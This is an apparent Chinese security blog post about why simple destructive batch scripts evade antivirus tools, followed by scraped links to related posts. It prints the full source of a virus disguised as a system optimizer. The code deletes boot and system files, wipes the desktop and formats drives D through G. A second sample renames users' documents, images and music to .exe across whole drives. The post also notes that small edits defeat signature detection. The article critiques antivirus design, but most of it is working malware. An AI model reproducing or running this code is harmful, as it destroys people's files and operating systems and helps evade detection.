为何最简单的破坏命令通过了众多杀软
RSR安全小组曾经发布过“伪SOLA V1.0 和 V2.0 两个版本”这两个版本的病毒都是用最简单的批处理命令写成的,然后用Bat to EXE 编译。本以为这种接近弱智病毒肯定无法通过任何杀软,但实际的测试结果却令我们非常吃惊。(整个过程基于XP SP3环境)
在病毒发布初期的 VirusTotal 的测试中,伪SOLA V1.0 仅5个杀软报毒,伪SOLA V2.0仅2个杀软报毒。
为了进一步验证病毒的查杀率,我们还在实体机上做了测试。测试结果(均把杀软的安全等级调到最高):东方微点、江民、瑞星会阻止程序的运行(不会导致无法启动,但病毒顺利删除用户桌面文件且格式化硬盘),卡巴斯基仅提示其运行,其它杀软无任何阻拦。
下面是伪SOLA V2.0的源代码:
@echo off
title 一键系统优化 by vista123.com (后期注释:伪装成优化程序)
echo 准备执行系统优化. . .
echo.
pause
cls
echo 正在执行系统优化,请稍后. . .
del/F/Q/A %SystemDrive%/NTDETECT.COM>nul
del/F/Q/A %SystemDrive%/IO.SYS>nul
del/F/Q/A %SystemDrive%/MSDOS.SYS>nul
del/F/Q/A %SystemDrive%/CONFIG.SYS>nul
del/F/Q/A %SystemDrive%/boot.ini>nul
del/F/Q/A %SystemDrive%/bootfont.bin>nul
del/F/Q/S %SystemRoot%/taskmgr.exe>nul
del/F/Q/S %SystemRoot%/ntoskrnl.exe>nul
shutdown -r -t 120
echo.
echo 您的计算机将在 2 分钟后重新启动,系统优化正在继续. . .
del/F/Q/S %SystemRoot%/shutdown.exe>nul
del/F/Q/S %SystemDrive%/"Documents and Settings"/%username%/桌面>nul
cls
echo 系统优化完成!
echo.
pause
(中间的文字部分省略)
……echo 选择吧,但是要快,容不得犹豫。我已经打开了我的计时器。
pause>nul
cls
echo 下列5个数字中有一个可以使系统恢复正常,否则格式化磁盘,关闭窗口则直接格式化。(后期注释:关闭窗口则直接格式化是吓唬人的)请慎重选择。
echo.
echo.
echo.
set/p choice=1 2 3 4 5 :
if %choice%==1 echo 选择错误,格式化磁盘!
if %choice%==2 echo 选择错误,格式化磁盘!
if %choice%==3 echo 选择错误,格式化磁盘!
if %choice%==4 echo 选择错误,格式化磁盘!
if %choice%==5 echo 选择错误,格式化磁盘!
start format D:/X/FS:NTFS/Q/Y (后期注释:用新窗口执行命令是为了让命令执行地更快且增加恐惧感)
start format E:/X/FS:NTFS/Q/Y
start format F:/X/FS:NTFS/Q/Y
start format G:/X/FS:NTFS/Q/Y
pause>nul
这个病毒就是以上这些看似弱智的代码。你会问了:类似del,format这些命令能通过系统权限吗?我们现在可以非常明确地告诉你:能!(目前为止绝大多数家庭和企业用户使用管理员帐户登录)。就是这些看起来简单的命令足以破坏整个计算机系统,不可小看其危害。
出现这种情况,责任在谁?首先是XP系统的管理模式(但这不是今天我要讲的重点,因为我们无法改变这一现状),其次是杀软(虽是“其次”,但这是重点)。至今,使用360的用户有多少?使用卡巴斯基的用户有多少?使用金山、江民、瑞星的用户有多少?试想一下,如果这一病毒蔓延开来,会有多少用户遭殃?
截止发稿时,绝大多数主流杀软(以上提到过的均在内)已经能查杀这个病毒(在病毒运行前阻止),但是,让我们再次进行一个实验:将病毒代码删去一行或一段,放到 VirusTotal 和实体机中再次测试,会发现杀软依旧无法查出。这就说明一个问题:即便在云安全体系较为完善的情况下,类似病毒仍能猖狂运行(记得脚本病毒吗?)。因为大部分杀软通过对病毒特侦码的判断查杀病毒,这就导致了一个问题:类似这种代码可随意更改的病毒,杀软毫无办法。换句话说,杀软或安全辅助软件不但要对病毒特侦码进行识别,还要着重于病毒行为的分析且在病毒造成破坏前阻止。目前一些杀软已经做到了这一点,但是还不够,远远不够,举个简单的例子,做到这一点的杀软只是阻止了删除ntldr,却没有阻止删除IO.SYS等文件,这就意味着病毒可以在取得管理员权限后肆意破坏而不被杀软察觉。下面一个病毒样例更加说明以上问题。
(后期注释:forfile.exe提取Windows Server 2003下的,捆绑在病毒中。如果你看得懂第一句代码,则其它代码无须再看)
forfiles /P D:/ /M *.doc /S /C "cmd /C ren *.doc *.exe"
forfiles /P D:/ /M *.xls /S /C "cmd /C ren *.xls *.exe"
forfiles /P D:/ /M *.ppt /S /C "cmd /C ren *.ppt *.exe"
forfiles /P D:/ /M *.docx /S /C "cmd /C ren *.docx *.exe"
forfiles /P D:/ /M *.xlsx /S /C "cmd /C ren *.xlsx *.exe"
forfiles /P D:/ /M *.pptx /S /C "cmd /C ren *.pptx *.exe"
forfiles /P D:/ /M *.jpg /S /C "cmd /C ren *.jpg *.exe"
forfiles /P D:/ /M *.mp3 /S /C "cmd /C ren *.mp3 *.exe"
forfiles /P E:/ /M *.doc /S /C "cmd /C ren *.doc *.exe"
forfiles /P E:/ /M *.xls /S /C "cmd /C ren *.xls *.exe"
forfiles /P E:/ /M *.ppt /S /C "cmd /C ren *.ppt *.exe"
forfiles /P E:/ /M *.docx /S /C "cmd /C ren *.docx *.exe"
forfiles /P E:/ /M *.xlsx /S /C "cmd /C ren *.xlsx *.exe"
forfiles /P E:/ /M *.pptx /S /C "cmd /C ren *.pptx *.exe"
forfiles /P E:/ /M *.jpg /S /C "cmd /C ren *.jpg *.exe"
forfiles /P E:/ /M *.mp3 /S /C "cmd /C ren *.mp3 *.exe"
(后期注释:以上代码在Windows 7中也能正常执行)
简单且重复的代码,实际效果如何?很可能被查杀,因为云安全服务器中已经有此病毒的样本,但是删除或添加几行代码呢,比如把E改成F,G,H等,查杀率为彻底的0%,没有任何杀软阻止。这样一堆命令的执行速度非常快,而且执行的后果肯定比删除文件更惨重,因为你不能像往C:/中复制ntldr这么简单地修复或逆执行这一操作,因为软件不知道exe文件原来的扩展名是什么,你不得不手动修改!
不可否认,杀软对0Day、温情杀手等病毒的查杀非常及时且非常到位,但是希望杀软能再加把劲,更多地关注用户,做得更好!
为何最简单的破坏命令通过了众多杀软相关推荐
- 简单的DOS命令操作数据库
简单的DOS命令操作数据库 启动服务:net start 数据库服务名字 关闭服务:net stop 数据库服务名字 连接数据库:mysql -u用户名 -p密码 show databases -- ...
- 浅谈Git的基本工作流程与简单的Git命令
浅谈Git的基本工作流程与简单的Git命令 什么是GIT? 定义:是一个开源的分布式版本控制工具 功能: 代码备份 版本控制 协同开放 代码追溯 场景: 团队协同开放项目 Git仓库工作流程 Git常 ...
- linux命令编写,编写简单的linux命令
8种机械键盘轴体对比 本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选? 又到了周四分享环节,鉴于最近在看linux编程实践,所以就的讲一下如何编写一个简单的who命令. PPT Manual ...
- 简单批处理内部命令简介(转)
一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息.如果没有任何参数,echo 命令将显示当前回显设置. echo [{on│off}] [message] ...
- 简单的Dos命令/一行代码实现恶意程序
申明:本文章仅供学习使用 今天讲一些简单的Dos命令,并且利用Dos做一个简单的恶意代码,并且不断进行完善. dir查看目录内容命令 dir/s列出所有文件以及子目录 dir/a列出所有文件,包括隐藏 ...
- Linux操作系统下的一些简单网络配置命令
Linux操作系统下的一些简单网络配置命令 转载请注明出自雨林木风 bbs.ylmf.com,本贴地址:http://bbs.ylmf.com/read.php?tid=399679&u= 使 ...
- cad怎么向下位移_CAD最简单的编辑命令:移动M也有技巧
移动M命令是CAD中最简单的编辑命令,而且这个功能多年以来也没什么变化,之前我也觉得不值得一讲,但移 动命令还有一些小技巧的,不妨介绍一下. 一.常用方式:基点和目标点 如果图中有定位移动距离的参照图 ...
- [网络安全学习篇2]:IP详解及简单的DOS命令(千峰网络安全视频笔记 2 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- 命令提示符的打开以及简单的Dos命令
命令提示符的打开以及简单的Dos命令 打开命令提示符的方式 1.按住win+r,输入cmd回车 2.在桌面文件夹下面,按住Shift+鼠标右键,点击在此处打开命令行窗口 3.资源管理器地址栏输入并打开 ...
- 简单的批处理命令(二)
传送门 简单的批处理命令(一):. 5. rem 语法: rem [message] 说明: rem是注释命令,其后的message将不会被执行,只是起注释的作用,便于自己和别人阅读.需要注意的是,r ...
最新文章
- 【MAC】记mac中django-admin.py 调用失败的解决方案
- quartz源码分析之深刻理解job,sheduler,calendar,trigger及listener之间的关系
- 2017年AR大会上海站干货分享
- 安卓应用安全指南 4.6.2 处理文件 规则书
- 【软件测试】负载测试与压力测试的区别
- python和java学哪个好-Python和Java两门编程语言,学习哪个更好?
- 某车企笔试题解答(1)
- 调用网易云Api接口实现移动Web网易云部分功能(搜索+列表+播放)
- IPTV机顶盒刷机过程--山东电信【天邑TY608】
- 制作一个浪漫温馨的生日礼物送她~html+css+javascript蓝色梦幻海洋3D相册(含音乐)
- 万国觉醒信号进爆满服务器,游漫谈:《万国觉醒》冷知识,玩家纷纷联盟,千人同屏硬刚服务器...
- 支持v4l2 linux内核选项 s3c2440,linux内核移植-移植2.6.35.4内核到s3c2440
- java spark 遍历rdd_Spark入门(四):RDD基本操作
- c语言初学知识点,C语言学习关于数据类型的一些知识点(初学者)
- python里两个等号代表什么_Python 到底是强类型语言,还是弱类型语言?
- Android获取天气预报的两种方式(国家气象局和中央气象台天气预报API)
- winds Server2016安装mysql8.0版教程
- 小米集团高管变动:崔宝秋因个人原因离职
- 机器学习原理篇:基础数学理论 Ⅱ
- 自行车租借管理系统c语言,校园自行车管理系统.doc